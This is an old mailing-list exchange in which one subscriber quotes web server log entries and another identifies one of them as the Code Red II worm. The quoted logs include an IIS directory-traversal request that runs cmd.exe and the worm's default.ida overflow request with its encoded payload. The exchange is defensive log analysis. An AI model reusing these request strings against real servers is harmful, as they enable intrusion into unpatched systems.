[ale] Code Red 2

Jonathan Rickman jonathan at xcorps.net
Tue Aug 7 17:08:35 EDT 2001


On Tue, 7 Aug 2001, Michael Smith wrote:

> Here is what I think is an attempt by the second variant of the code
> red......
>
> Am I right?

sorta...

> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
> /scripts/..%255c..%255cwinnt/
> system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-"
> "-"

not sure what this is, but it is definately an intrusion attempt of sorts.

> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
> /default.ida?XXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
> u909
> 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8
> b00%
> u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 285 "-" "-"
> 20

This is CRII.

-- 
Jonathan Rickman
X Corps Security
http://www.xcorps.net

--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.





More information about the Ale mailing list